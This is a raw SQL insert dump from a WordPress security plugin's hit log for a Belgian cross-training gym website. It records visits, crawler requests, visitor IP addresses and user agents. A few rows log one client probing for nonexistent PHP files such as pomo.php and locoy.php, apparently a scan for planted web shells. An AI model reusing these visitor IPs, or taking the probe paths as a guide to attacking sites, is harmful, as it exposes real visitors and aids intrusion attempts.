(68694, 1491146043.928445, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68695, 1491147484.491608, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68696, 1491148538.418291, 1054099761, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'),
(68697, 1491148666.210576, 2366148132, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70865, 1493266762.534623, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70866, 1493266767.063512, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70867, 1493266771.620880, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70868, 1493284892.863510, 1837156116, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70869, 1493289504.654082, 3429212575, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(70870, 1493290325.750006, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0ahUKEwiWqPT3u8TTAhVBVhoKHbm6AGwQ_BcIiwEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70871, 1493290328.753156, 3267064321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(70872, 1493292343.791888, 2995859706, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70873, 1493292346.564231, 2995859706, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70874, 1493292347.096978, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70875, 1493292347.589311, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70876, 1493292348.065497, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70877, 1493292348.575474, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70878, 1493292349.176127, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70879, 1493292349.701595, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70880, 1493292350.182535, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70881, 1493292350.661427, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70882, 1493292351.143954, 2995859706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70883, 1493305187.891114, 676177811, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70884, 1493305194.301743, 2637637595, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70885, 1493305227.273182, 1837953980, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(68603, 1490954885.118067, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68602, 1490953427.681444, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(68600, 1490953164.887139, 878139038, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(68601, 1490953427.272224, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(68599, 1490952241.470800, 1355396144, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68598, 1490952178.060429, 1355396144, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68698, 1491151703.616328, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68699, 1491153500.154821, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68700, 1491153661.528389, 90561644, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)'),
(68701, 1491156539.845907, 885654392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),
(68702, 1491156540.449944, 885654392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),
(68703, 1491157968.328121, 1538450291, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E277 [FBAN/FBIOS;FBAV/86.0.0.48.52;FBBV/53842252;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/53842252]'),
(68704, 1491159639.695636, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68705, 1491160922.910980, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68706, 1491169739.749549, 872548958, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ltx71 - (http://ltx71.com/)'),
(68707, 1491172048.394788, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68708, 1491178932.750793, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68709, 1491180240.963831, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68710, 1491188883.307421, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68711, 1491198602.085688, 1539836988, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(68712, 1491198602.958222, 1539836988, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68713, 1491203182.552309, 2745975302, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(68714, 1491203215.756395, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(68715, 1491208166.999873, 2999198281, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.fr/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68716, 1491209599.260743, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68717, 1491211566.273974, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjelvH5-4fTAhXKOxoKHUA0D2IQFgggMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68718, 1491211570.211720, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68719, 1491211570.593940, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68720, 1491212401.836935, 3475901740, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68721, 1491225128.360247, 3024883594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68722, 1491226231.151610, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68723, 1491226231.625604, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68724, 1491229774.530355, 1753457444, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68725, 1491229779.865468, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68726, 1491229782.520809, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68727, 1491229784.265221, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68728, 1491229789.704673, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68729, 1491229799.315674, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68730, 1491229804.922982, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68731, 1491229809.022600, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68732, 1491229813.762172, 1753457444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(68733, 1491232615.685063, 1757808628, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)'),
(68734, 1491233442.105254, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68735, 1491233444.800123, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68736, 1491233444.801959, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10602.4.8.0.1 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(68737, 1491233445.324997, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10602.4.8.0.1 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(68738, 1491233445.837051, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68739, 1491237010.744715, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/pomo.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68740, 1491239474.809837, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68741, 1491241034.853744, 3475901930, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68742, 1491241289.477829, 1402770394, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.fr/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68743, 1491243061.595915, 1897166120, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(68744, 1491245178.257330, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68745, 1491245185.534090, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68746, 1491245186.255223, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68747, 1491245186.766859, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68748, 1491245187.228037, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68749, 1491245187.657202, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68750, 1491245188.156497, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68751, 1491245188.716745, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68752, 1491245189.275507, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68753, 1491245189.816145, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68754, 1491245190.512048, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68755, 1491245190.995133, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68756, 1491253265.032171, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68757, 1491253266.065958, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68758, 1491253266.535402, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68759, 1491255138.498595, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/locoy.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68760, 1491258549.417015, 96241765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0'),
(68761, 1491259174.409155, 3110360645, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstoneconstruction.com/', 'Mozilla/4.0 (compatible  MSIE 8.0  Windows NT 5.1  Trident/4.0  WebMoney Advisor  .NET CLR 1.1.4322  InfoPath.2  .NET CLR 2.0.50727  .NET CLR 3.0.04506.30  .NET CLR 3.0.4506.2152  .NET CLR 3.5.30729  .NET4.0C  .NET4.0E  MS-RTC LM 8  BO2IE8_v1 ENUS)'),
(68762, 1491263170.728798, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(68763, 1491264028.758869, 3475901939, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68764, 1491264794.789578, 3475901939, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68765, 1491273399.034249, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68766, 1491273408.189500, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68767, 1491275675.905595, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68768, 1491279326.852284, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68769, 1491290925.449664, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68770, 1491291650.321282, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/search.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68771, 1491292403.605067, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68772, 1491292404.256997, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(68773, 1491292404.839876, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68774, 1491292405.338983, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68775, 1491292405.820609, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68776, 1491292406.361932, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68777, 1491292406.915686, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68778, 1491292407.384038, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68779, 1491292407.917173, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68780, 1491292408.396400, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68781, 1491292409.091704, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68782, 1491297864.572118, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68783, 1491299949.580407, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjF8_SaxYrTAhXFzRQKHQHMAH0QFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=cx-iKwUTkUhJilhSHuSm5Q', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68784, 1491299954.132903, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
